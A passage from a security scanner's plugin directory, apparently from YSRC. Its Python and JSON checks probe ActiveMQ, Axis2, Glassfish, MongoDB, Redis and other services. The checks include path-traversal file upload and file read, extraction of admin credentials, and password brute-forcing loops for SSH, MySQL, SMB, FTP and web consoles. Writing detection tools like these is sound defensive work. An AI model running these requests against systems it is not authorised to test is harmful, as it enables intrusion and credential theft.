"CVE-2015-1830,攻击者通过此漏洞可直接上传webshell,进而入侵控制服务器。", 11 | "level": "紧急", 12 | "type": "任意文件上传", 13 | "author": "wolf@YSRC", 14 | "url": "http://cve.scap.org.cn/CVE-2015-1830.html", 15 | "keyword": "title:ActiveMQ", 16 | "source": 1 17 | } 18 | return plugin_info 19 | 20 | def random_str(len): 21 | str1 = "" 22 | for i in range(len): 23 | str1 += (random.choice("ABCDEFGH1234567890")) 24 | return str1 25 | 26 | def check(ip, port, timeout): 27 | try: 28 | socket.setdefaulttimeout(timeout) 29 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | s.connect((ip, port)) 31 | filename = random_str(6) 32 | flag = "PUT /fileserver/sex../../..\\admin/%s.txt HTTP/1.0\r\nContent-Length: 9\r\n\r\nxxscan0\r\n\r\n"%(filename) 33 | s.send(flag) 34 | time.sleep(1) 35 | s.recv(1024) 36 | s.close() 37 | url = 'http://' + ip + ":" + str(port) + '/admin/%s.txt'%(filename) 38 | res_html = urllib2.urlopen(url, timeout=timeout).read(1024) 39 | if 'xxscan0' in res_html: 40 | return u"存在任意文件上传漏洞," + url 41 | except: 42 | pass 43 | -------------------------------------------------------------------------------- /celerynode/vuldb/axis_config_read.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import re 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Axis2任意文件读取", 9 | "info": "通过此漏洞可以读取配置文件等信息,进而登陆控制台,通过部署功能可直接获取服务器权限。", 10 | "level": "高危", 11 | "type": "任意文件读取", 12 | "author": "wolf@YSRC", 13 | "url": "http://www.securityfocus.com/bid/40343/info", 14 | "keyword": "tag:axis", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | def check(host, port, timeout): 20 | try: 21 | url = "http://%s:%d" % (host, int(port)) 22 | res = urllib2.urlopen(url + '/axis2/services/listServices', timeout=timeout) 23 | res_code = res.code 24 | res_html = res.read() 25 | if int(res_code) == 404: return 26 | m = re.search('\/axis2\/services\/(.*?)\?wsdl">.*?<\/a>', res_html) 27 | if m.group(1): 28 | 
server_str = m.group(1) 29 | read_url = url + '/axis2/services/%s?xsd=../conf/axis2.xml' % (server_str) 30 | res = urllib2.urlopen(read_url, timeout=timeout) 31 | res_html = res.read() 32 | if 'axisconfig' in res_html: 33 | user = re.search('(.*?)', res_html) 34 | password = re.search('(.*?)', res_html) 35 | info = u'%s 存在任意文件读取漏洞 %s:%s' % (read_url, user.group(1), password.group(1)) 36 | return info 37 | except Exception, e: 38 | pass 39 | -------------------------------------------------------------------------------- /celerynode/vuldb/axis_info.json: -------------------------------------------------------------------------------- 1 | { 2 | "name" : "Axis2信息泄露", 3 | "info" : "HappyAxis.jsp 页面存在系统敏感信息。", 4 | "level" : "低危", 5 | "type" : "信息泄露", 6 | "author" : "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "tag:axis2", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/axis2/axis2-web/HappyAxis.jsp", 12 | "tag" : "敏感信息泄露", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "Axis2 Happiness Page", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /celerynode/vuldb/crack_axis.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # author:wolf 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Axis2控制台弱口令", 9 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "http://www.codesec.net/view/247352.html", 14 | "keyword": "tag:axis", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(host, port, timeout): 21 | url = "http://%s:%d" % (host, int(port)) 22 | error_i = 0 23 | flag_list = ['Administration Page', 'System Components', '"axis2-admin/upload"', 24 | 'include page="footer.inc">', 'axis2-admin/logout'] 25 | user_list = ['axis', 'admin', 'root'] 26 | PASSWORD_DIC.append('axis2') 27 | for user in 
user_list: 28 | for password in PASSWORD_DIC: 29 | try: 30 | login_url = url + '/axis2/axis2-admin/login' 31 | PostStr = 'userName=%s&password=%s&submit=+Login+' % (user, password) 32 | request = urllib2.Request(login_url, PostStr) 33 | res = urllib2.urlopen(request, timeout=timeout) 34 | res_html = res.read() 35 | except urllib2.HTTPError, e: 36 | return 37 | except urllib2.URLError, e: 38 | error_i += 1 39 | if error_i >= 3: 40 | return 41 | continue 42 | for flag in flag_list: 43 | if flag in res_html: 44 | info = u'存在弱口令,用户名:%s,密码:%s' % (user, password) 45 | return info 46 | -------------------------------------------------------------------------------- /celerynode/vuldb/crack_cisco_web.py: -------------------------------------------------------------------------------- 1 | #coding=utf-8 2 | import urllib2 3 | import ssl 4 | import base64 5 | try: 6 | _create_unverified_https_context = ssl._create_unverified_context # 忽略证书错误 7 | except AttributeError: 8 | pass 9 | else: 10 | ssl._create_default_https_context = _create_unverified_https_context 11 | 12 | def get_plugin_info(): 13 | plugin_info = { 14 | "name": "Cisco_WEB弱口令", 15 | "info": "攻击者可进入web控制台,进而接管控制设备。", 16 | "level": "高危", 17 | "type": "弱口令", 18 | "author": "wolf@YSRC", 19 | "url": "", 20 | "keyword": "tag:cisco", 21 | "source": 1 22 | } 23 | return plugin_info 24 | 25 | def check(ip,port,timeout): 26 | error_i=0 27 | user_list=['admin','cisco','root'] 28 | if port == 443: 29 | url = "https://" + ip + ":" + str(port) 30 | else: 31 | url = "http://" + ip + ":" + str(port) 32 | try: 33 | urllib2.urlopen(url, timeout=timeout) 34 | return 35 | except urllib2.HTTPError,e: 36 | if e.code != 401:return 37 | except: 38 | return 39 | for user in user_list: 40 | for pass_ in PASSWORD_DIC: 41 | try: 42 | pass_ = str(pass_.replace('{user}', user)) 43 | request = urllib2.Request(url) 44 | auth_str_temp=user+':'+pass_ 45 | auth_str=base64.b64encode(auth_str_temp) 46 | request.add_header('Authorization', 'Basic 
'+auth_str) 47 | res = urllib2.urlopen(request,timeout=timeout) 48 | res_code = res.code 49 | if res_code == 200: 50 | return u'存在弱口令 %s:%s' % (user, pass_) 51 | except urllib2.HTTPError: 52 | continue 53 | except urllib2.URLError,e: 54 | error_i+=1 55 | if error_i >= 3:return 56 | continue 57 | else: 58 | pass -------------------------------------------------------------------------------- /celerynode/vuldb/crack_ftp.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import ftplib 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "FTP弱口令", 8 | "info": "导致敏感信息泄露,严重情况可导致服务器被入侵控制。", 9 | "level": "高危", 10 | "type": "弱口令", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "server:ftp", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | user_list = ['ftp', 'www', 'admin', 'root', 'db', 'wwwroot', 'data', 'web'] 21 | for user in user_list: 22 | for pass_ in PASSWORD_DIC: 23 | pass_ = str(pass_.replace('{user}', user)) 24 | try: 25 | ftp = ftplib.FTP() 26 | ftp.timeout = timeout 27 | ftp.connect(ip, port) 28 | ftp.login(user, pass_) 29 | if pass_ == '': pass_ = "null" 30 | if user == 'ftp' and pass_ == 'ftp': return u"可匿名登录" 31 | return u"存在弱口令,账号:%s,密码:%s" % (user, pass_) 32 | except Exception, e: 33 | if "Errno 10061" in str(e) or "timed out" in str(e): return -------------------------------------------------------------------------------- /celerynode/vuldb/crack_glassfish.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # author:wolf 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Glassfish弱口令", 9 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "http://www.codesec.net/view/266845.html", 14 | "keyword": "server:ftp", 15 | "source": 1 16 | } 17 | return plugin_info 
18 | 19 | 20 | def check(host, port, timeout): 21 | url = "http://%s:%d" % (host, int(port)) 22 | error_i = 0 23 | flag_list = ['Just refresh the page... login will take over', 'GlassFish Console - Common Tasks', 24 | '/resource/common/js/adminjsf.js">', 'Admin Console', 'src="/homePage.jsf"', 25 | 'src="/header.jsf"', 'src="/index.jsf"', 'Common Tasks', 'title="Logout from GlassFish'] 26 | user_list = ['admin'] 27 | PASSWORD_DIC.append('glassfish') 28 | for user in user_list: 29 | for password in PASSWORD_DIC: 30 | try: 31 | PostStr = 'j_username=%s&j_password=%s&loginButton=Login&loginButton.DisabledHiddenField=true' % ( 32 | user, password) 33 | request = urllib2.Request(url + '/j_security_check?loginButton=Login', PostStr) 34 | res = urllib2.urlopen(request, timeout=timeout) 35 | res_html = res.read() 36 | except urllib2.HTTPError: 37 | return 38 | except urllib2.URLError: 39 | error_i += 1 40 | if error_i >= 3: 41 | return 42 | continue 43 | for flag in flag_list: 44 | if flag in res_html: 45 | info = u'存在弱口令,用户名:%s,密码:%s' % (user, password) 46 | return info 47 | -------------------------------------------------------------------------------- /celerynode/vuldb/crack_grafana.py: -------------------------------------------------------------------------------- 1 | #-*- encoding:utf-8 -*- 2 | import urllib 3 | import urllib2 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "grafana 弱口令", 8 | "info": "对grafana控制台进行弱口令检测", 9 | "level": "高危", 10 | "type": "弱口令", 11 | "author": "hos@YSRC", 12 | "url": "https://hackerone.com/reports/174883", 13 | "keyword": "banner:grafana", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip,port,timeout): 20 | url="http://%s:%s/login"%(ip,str(port)) 21 | header={ 22 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.96 Safari/537.36', 23 | 'ContentType': 'application/x-www-form-urlencoded; chartset=UTF-8', 24 | 'Accept-Encoding': 
'gzip, deflate', 25 | 'Accept-Language': 'zh-CN,zh;q=0.8', 26 | 'Connection': 'close' 27 | } 28 | for password in PASSWORD_DIC: 29 | data={"user":"admin","email":"","password":password} 30 | data=urllib.urlencode(data) 31 | request = urllib2.Request(url=url,data=data,headers=header) 32 | try: 33 | res=urllib2.urlopen(request,timeout=timeout) 34 | if "Logged in" in res.read(): 35 | info = u'存在弱口令,用户名:%s,密码:%s' % ("admin", password) 36 | return info 37 | except Exception,e: 38 | pass 39 | -------------------------------------------------------------------------------- /celerynode/vuldb/crack_mongo.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | import binascii 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "MongoDB未授权访问", 9 | "info": "导致数据库敏感信息泄露。", 10 | "level": "中危", 11 | "type": "未授权访问", 12 | "author": "wolf@YSRC", 13 | "url": "", 14 | "keyword": "server:mongodb", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(ip, port, timeout): 21 | try: 22 | socket.setdefaulttimeout(timeout) 23 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 24 | s.connect((ip, int(port))) 25 | data = binascii.a2b_hex( 26 | "3a000000a741000000000000d40700000000000061646d696e2e24636d640000000000ffffffff130000001069736d6173746572000100000000") 27 | s.send(data) 28 | result = s.recv(1024) 29 | if "ismaster" in result: 30 | getlog_data = binascii.a2b_hex( 31 | "480000000200000000000000d40700000000000061646d696e2e24636d6400000000000100000021000000026765744c6f670010000000737461727475705761726e696e67730000") 32 | s.send(getlog_data) 33 | result = s.recv(1024) 34 | if "totalLinesWritten" in result: 35 | return u"未授权访问" 36 | except Exception, e: 37 | pass 38 | -------------------------------------------------------------------------------- /celerynode/vuldb/crack_mysql.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 
| import re 3 | import hashlib 4 | import struct 5 | import binascii 6 | import socket 7 | 8 | 9 | def get_plugin_info(): 10 | plugin_info = { 11 | "name": "MySQL弱口令", 12 | "info": "导致数据库敏感信息泄露,严重可导致服务器直接被入侵。", 13 | "level": "高危", 14 | "type": "弱口令", 15 | "author": "wolf@YSRC", 16 | "url": "", 17 | "keyword": "server:mysql", 18 | "source": 1 19 | } 20 | return plugin_info 21 | 22 | 23 | def get_hash(password, scramble): 24 | hash_stage1 = hashlib.sha1(password).digest() 25 | hash_stage2 = hashlib.sha1(hash_stage1).digest() 26 | to = hashlib.sha1(scramble + hash_stage2).digest() 27 | reply = [ord(h1) ^ ord(h3) for (h1, h3) in zip(hash_stage1, to)] 28 | hash = struct.pack('20B', *reply) 29 | return hash 30 | 31 | 32 | def get_scramble(packet): 33 | tmp = packet[15:] 34 | m = re.findall("\x00?([\x01-\x7F]{7,})\x00", tmp) 35 | if len(m) > 3: del m[0] 36 | scramble = m[0] + m[1] 37 | try: 38 | plugin = m[2] 39 | except: 40 | plugin = '' 41 | return plugin, scramble 42 | 43 | 44 | def get_auth_data(user, password, scramble, plugin): 45 | user_hex = binascii.b2a_hex(user) 46 | pass_hex = binascii.b2a_hex(get_hash(password, scramble)) 47 | if not password: 48 | data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0000" 49 | else: 50 | data = "85a23f0000000040080000000000000000000000000000000000000000000000" + user_hex + "0014" + pass_hex 51 | if plugin: data += binascii.b2a_hex( 52 | plugin) + "0055035f6f73076f737831302e380c5f636c69656e745f6e616d65086c69626d7973716c045f7069640539323330360f5f636c69656e745f76657273696f6e06352e362e3231095f706c6174666f726d067838365f3634" 53 | len_hex = hex(len(data) / 2).replace("0x", "") 54 | auth_data = len_hex + "000001" + data 55 | return binascii.a2b_hex(auth_data) 56 | 57 | 58 | def check(ip, port, timeout): 59 | socket.setdefaulttimeout(timeout) 60 | user_list = ['root'] 61 | for user in user_list: 62 | for pass_ in PASSWORD_DIC: 63 | try: 64 | pass_ = str(pass_.replace('{user}', user)) 65 | sock = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) 66 | sock.connect((ip, int(port))) 67 | packet = sock.recv(254) 68 | # print packet 69 | plugin, scramble = get_scramble(packet) 70 | auth_data = get_auth_data(user, pass_, scramble, plugin) 71 | sock.send(auth_data) 72 | result = sock.recv(1024) 73 | if result == "\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00": 74 | return u"存在弱口令,账号:%s,密码:%s" % (user, pass_) 75 | except Exception, e: 76 | if "Errno 10061" in str(e) or "timed out" in str(e): return -------------------------------------------------------------------------------- /celerynode/vuldb/crack_postgres.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 3 | import hashlib 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "PostgresSQL弱口令", 9 | "info": "导致数据库敏感信息泄露,严重可导致服务器直接被入侵。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "hos@YSRC", 13 | "url": "", 14 | "keyword": "server:postgresql", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def make_response(username, password, salt): 21 | pu = hashlib.md5(password + username).hexdigest() 22 | buf = hashlib.md5(pu + salt).hexdigest() 23 | return 'md5' + buf 24 | 25 | 26 | def auth(host, port, username, password, timeout): 27 | try: 28 | socket.setdefaulttimeout(timeout) 29 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 30 | sock.connect((host, port)) 31 | packet_length = len(username) + 7 + len( 32 | "\x03user database postgres application_name psql client_encoding UTF8 ") 33 | p = "%c%c%c%c%c\x03%c%cuser%c%s%cdatabase%cpostgres%capplication_name%cpsql%cclient_encoding%cUTF8%c%c" % ( 34 | 0, 0, 0, packet_length, 0, 0, 0, 0, username, 0, 0, 0, 0, 0, 0, 0, 0) 35 | sock.send(p) 36 | packet = sock.recv(1024) 37 | if packet[0] == 'R': 38 | authentication_type = str([packet[8]]) 39 | c = int(authentication_type[4:6], 16) 40 | if c == 5: salt = packet[9:] 41 | else: 42 | return 3 43 | lmd5 = 
make_response(username, password, salt) 44 | packet_length1 = len(lmd5) + 5 + len('p') 45 | pp = 'p%c%c%c%c%s%c' % (0, 0, 0, packet_length1 - 1, lmd5, 0) 46 | sock.send(pp) 47 | packet1 = sock.recv(1024) 48 | if packet1[0] == "R": 49 | return True 50 | except Exception, e: 51 | if "Errno 10061" in str(e) or "timed out" in str(e): return 3 52 | 53 | 54 | def check(ip, port, timeout): 55 | user_list = ['postgres', 'admin'] 56 | for user in user_list: 57 | for pass_ in PASSWORD_DIC: 58 | try: 59 | pass_ = str(pass_.replace('{user}', user)) 60 | result = auth(ip, port, user, pass_, timeout) 61 | if result == 3: break 62 | if result == True: return u"存在弱口令,用户名:%s 密码:%s" % (user, pass_) 63 | except Exception, e: 64 | pass 65 | -------------------------------------------------------------------------------- /celerynode/vuldb/crack_redis.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "Redis弱口令", 8 | "info": "导致数据库敏感信息泄露,严重可导致服务器被入侵。", 9 | "level": "高危", 10 | "type": "弱口令", 11 | "author": "wolf@YSRC", 12 | "url": "http://www.freebuf.com/vuls/85021.html", 13 | "keyword": "server:redis", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | socket.setdefaulttimeout(timeout) 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | s.connect((ip, int(port))) 24 | s.send("INFO\r\n") 25 | result = s.recv(1024) 26 | if "redis_version" in result: 27 | return u"未授权访问" 28 | elif "Authentication" in result: 29 | for pass_ in PASSWORD_DIC: 30 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 31 | s.connect((ip, int(port))) 32 | s.send("AUTH %s\r\n" % (pass_)) 33 | result = s.recv(1024) 34 | if '+OK' in result: 35 | return u"存在弱口令,密码:%s" % (pass_) 36 | except Exception, e: 37 | pass 38 | -------------------------------------------------------------------------------- 
/celerynode/vuldb/crack_resin.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | # author:wolf 3 | import urllib2 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "Resin控制台弱口令", 9 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "http://www.360doc.com/content/15/0722/22/11644963_486744404.shtml", 14 | "keyword": "tag:resin", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(host, port, timeout): 21 | url = "http://%s:%d" % (host, int(port)) 22 | error_i = 0 23 | flag_list = ['', 'The Resin version', 'Resin Summary'] 24 | user_list = ['admin'] 25 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 26 | for user in user_list: 27 | for password in PASSWORD_DIC: 28 | try: 29 | PostStr = 'j_username=%s&j_password=%s' % (user, password) 30 | res = opener.open(url + '/resin-admin/j_security_check?j_uri=index.php', PostStr ,timeout=timeout) 31 | res_html = res.read() 32 | res_code = res.code 33 | except urllib2.HTTPError, e: 34 | return 35 | except urllib2.URLError, e: 36 | error_i += 1 37 | if error_i >= 3: 38 | return 39 | continue 40 | for flag in flag_list: 41 | if flag in res_html or int(res_code) == 408: 42 | info = u'%s/resin-admin 存在弱口令 用户名:%s,密码:%s' % (url, user, password) 43 | return info 44 | -------------------------------------------------------------------------------- /celerynode/vuldb/crack_ruijie_ac_web.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import urllib2 3 | import ssl 4 | import base64 5 | 6 | try: 7 | _create_unverified_https_context = ssl._create_unverified_context # 忽略证书错误 8 | except AttributeError: 9 | pass 10 | else: 11 | ssl._create_default_https_context = _create_unverified_https_context 12 | 13 | 14 | def get_plugin_info(): 15 | plugin_info = { 16 | "name": "锐捷AC弱口令", 17 | "info": 
"攻击者可进入web控制台,进而接管控制设备。", 18 | "level": "高危", 19 | "type": "弱口令", 20 | "author": "wolf@YSRC", 21 | "url": "", 22 | "keyword": "banner:RGOS;port:80", 23 | "source": 1 24 | } 25 | return plugin_info 26 | 27 | 28 | def check(ip, port, timeout): 29 | error_i = 0 30 | user_list = ['admin'] 31 | if port == 443: 32 | url = "https://" + ip + ":" + str(port) + "/login.do" 33 | else: 34 | url = "http://" + ip + ":" + str(port) + "/login.do" 35 | for user in user_list: 36 | for pass_ in PASSWORD_DIC: 37 | try: 38 | pass_ = str(pass_.replace('{user}', user)) 39 | request = urllib2.Request(url) 40 | auth_str_temp = user + ':' + pass_ 41 | auth_str = base64.b64encode(auth_str_temp) 42 | postdata = "auth=" + auth_str 43 | res = urllib2.urlopen(request, postdata, timeout=timeout) 44 | res_html = res.read() 45 | if "Success" in res_html: 46 | return u'存在弱口令 %s:%s' % (user, pass_) 47 | except urllib2.HTTPError: 48 | break 49 | except urllib2.URLError, e: 50 | error_i += 1 51 | if error_i >= 3: return 52 | continue 53 | else: 54 | pass 55 | -------------------------------------------------------------------------------- /celerynode/vuldb/crack_smb.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | from smb.SMBConnection import SMBConnection 3 | import socket 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "SMB弱口令", 8 | "info": "直接导致机器被直接入侵控制。", 9 | "level": "紧急", 10 | "type": "弱口令", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "server:smb", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | def ip2hostname(ip): 19 | try: 20 | hostname = socket.gethostbyaddr(ip)[0] 21 | return hostname 22 | except: 23 | pass 24 | try: 25 | query_data = "\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x20\x43\x4b\x41\x41" + \ 26 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" + \ 27 | "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x21\x00\x01" 28 | dport = 137 29 | _s = 
socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 30 | _s.sendto(query_data, (ip, dport)) 31 | x = _s.recvfrom(1024) 32 | tmp = x[0][57:] 33 | hostname = tmp.split("\x00", 2)[0].strip() 34 | hostname = hostname.split()[0] 35 | return hostname 36 | except: 37 | pass 38 | def check(ip,port,timeout): 39 | socket.setdefaulttimeout(timeout) 40 | user_list = ['administrator'] 41 | hostname = ip2hostname(ip) 42 | PASSWORD_DIC.insert(0,'anonymous') 43 | if not hostname:return 44 | for user in user_list: 45 | for pass_ in PASSWORD_DIC: 46 | try: 47 | pass_ = str(pass_.replace('{user}', user)) 48 | conn = SMBConnection(user,pass_,'xunfeng',hostname) 49 | if conn.connect(ip) == True: 50 | if pass_ == 'anonymous':return u"存在匿名共享,请查看是否存在敏感文件。" 51 | return u"存在弱口令,用户名:%s 密码:%s"%(user,pass_) 52 | except Exception,e: 53 | if "Errno 10061" in str(e) or "timed out" in str(e): return -------------------------------------------------------------------------------- /celerynode/vuldb/crack_ssh.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import paramiko 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "SSH弱口令", 8 | "info": "直接导致服务器被入侵控制。", 9 | "level": "紧急", 10 | "type": "弱口令", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "server:ssh", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | user_list = ['root', 'admin', 'oracle', 'weblogic'] 21 | ssh = paramiko.SSHClient() 22 | ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 23 | for user in user_list: 24 | for pass_ in PASSWORD_DIC: 25 | pass_ = str(pass_.replace('{user}', user)) 26 | try: 27 | ssh.connect(ip, port, user, pass_, timeout=timeout) 28 | ssh.exec_command('whoami') 29 | ssh.close() 30 | if pass_ == '': pass_ = "null" 31 | return u"存在弱口令,账号:%s,密码:%s" % (user, pass_) 32 | except Exception, e: 33 | if "Errno 61" in e or "timed out" in e: return 34 | 
-------------------------------------------------------------------------------- /celerynode/vuldb/crack_weblogic.py: -------------------------------------------------------------------------------- 1 | #coding:utf-8 2 | import urllib2 3 | def get_plugin_info(): 4 | plugin_info = { 5 | "name": "Weblogic弱口令", 6 | "info": "攻击者通过此漏洞可以登陆管理控制台,通过部署功能可直接获取服务器权限。", 7 | "level": "高危", 8 | "type": "弱口令", 9 | "author": "wolf@YSRC", 10 | "url": "http://jingyan.baidu.com/article/c74d6000650d470f6b595d72.html", 11 | "keyword": "tag:weblogic", 12 | "source": 1 13 | } 14 | return plugin_info 15 | def check(host,port,timeout): 16 | url = "http://%s:%d"%(host,int(port)) 17 | error_i=0 18 | flag_list=['WebLogic Server Console','javascript/console-help.js','WebLogic Server Administration Console Home','/console/console.portal','console/jsp/common/warnuserlockheld.jsp','/console/actions/common/'] 19 | user_list=['weblogic'] 20 | pass_list=['weblogic','password','Weblogic1','weblogic10','weblogic10g','weblogic11','weblogic11g','weblogic12','weblogic12g','weblogic13','weblogic13g','weblogic123','123456','12345678','123456789','admin123','admin888','admin1','administrator','8888888','123123','admin','manager','root'] 21 | opener = urllib2.build_opener(urllib2.HTTPCookieProcessor()) 22 | for user in user_list: 23 | for password in pass_list: 24 | try: 25 | PostStr='j_username=%s&j_password=%s&j_character_encoding=UTF-8'%(user,password) 26 | request = opener.open(url+'/console/j_security_check',PostStr,timeout=timeout) 27 | res_html = request.read() 28 | except urllib2.HTTPError,e: 29 | return 30 | except urllib2.URLError,e: 31 | error_i+=1 32 | if error_i >= 3: 33 | return 34 | continue 35 | for flag in flag_list: 36 | if flag in res_html: 37 | info = u'%s/console 账号:%s,密码:%s'%(url,user,password) 38 | return info -------------------------------------------------------------------------------- /celerynode/vuldb/git_index_disclosure.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "name": ".git代码泄露", 3 | "info": "未删除.git目录导致源代码信息泄露", 4 | "level": "中危", 5 | "type": "信息泄露", 6 | "author": "0xbug", 7 | "url": "https://github.com/git/git/blob/master/Documentation/technical/index-format.txt", 8 | "keyword": "server:web", 9 | "source": 1, 10 | "plugin": { 11 | "url": "/.git/config", 12 | "tag": "存在/.git/目录", 13 | "analyzing": "keyword", 14 | "analyzingdata": "repositoryformatversion", 15 | "data": "", 16 | "method": "GET" 17 | } 18 | } 19 | -------------------------------------------------------------------------------- /celerynode/vuldb/glassfish_filread.json: -------------------------------------------------------------------------------- 1 | { 2 | "name" : "Glassfish任意文件读取", 3 | "info" : "可读取服务器上的任意文件", 4 | "level" : "高危", 5 | "type" : "文件读取", 6 | "author" : "wolf@YSRC", 7 | "url": "http://bobao.360.cn/learning/detail/2564.html", 8 | "keyword" : "tag:glassfish", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/", 12 | "tag" : "存在任意文件读取漏洞", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "package-appclient.xml", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /celerynode/vuldb/hikvision_crackpass.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import urllib2 3 | import base64 4 | 5 | 6 | def get_plugin_info(): 7 | plugin_info = { 8 | "name": "海康威视摄像头弱口令", 9 | "info": "攻击者可进入web控制台,进而接管控制设备。", 10 | "level": "高危", 11 | "type": "弱口令", 12 | "author": "wolf@YSRC", 13 | "url": "", 14 | "keyword": "tag:hikvision", 15 | "source": 1 16 | } 17 | return plugin_info 18 | 19 | 20 | def check(ip, port, timeout): 21 | error_i = 0 22 | flag_list = ['>true= 3: return 41 | continue 42 | if int(res_code) == 404 or int(res_code) == 403: return 43 | if 
int(res_code) == 401: continue 44 | for flag in flag_list: 45 | if flag in res_html: 46 | return u'Hikvision网络摄像头弱口令 %s:%s' % (user, password) 47 | -------------------------------------------------------------------------------- /celerynode/vuldb/iis_shortfile.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import urllib2 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "IIS短文件名", 8 | "info": "攻击者可利用此特性猜解出目录与文件名,以达到类似列目录漏洞的效果。", 9 | "level": "低危", 10 | "type": "信息泄露", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "tag:iis", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | url = ip + ":" + str(port) 22 | flag_400 = '/otua*~1.*/.aspx' 23 | flag_404 = '/*~1.*/.aspx' 24 | request = urllib2.Request('http://' + url + flag_400) 25 | req = urllib2.urlopen(request, timeout=timeout) 26 | if int(req.code) == 400: 27 | req_404 = urllib2.urlopen('http://' + url + flag_404, timeout=timeout) 28 | if int(req_404.code) == 404: 29 | return u'iis 短文件名猜解漏洞' 30 | except Exception, e: 31 | pass 32 | -------------------------------------------------------------------------------- /celerynode/vuldb/iis_webdav.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import socket 3 | import time 4 | import urllib2 5 | 6 | 7 | def get_plugin_info(): 8 | plugin_info = { 9 | "name": "IIS WebDav", 10 | "info": "开启了WebDav且配置不当可导致攻击者直接上传webshell,进而导致服务器被入侵控制。", 11 | "level": "紧急", 12 | "type": "任意文件上传", 13 | "author": "wolf@YSRC", 14 | "url": "", 15 | "keyword": "tag:iis", 16 | "source": 1 17 | } 18 | return plugin_info 19 | 20 | 21 | def check(ip, port, timeout): 22 | 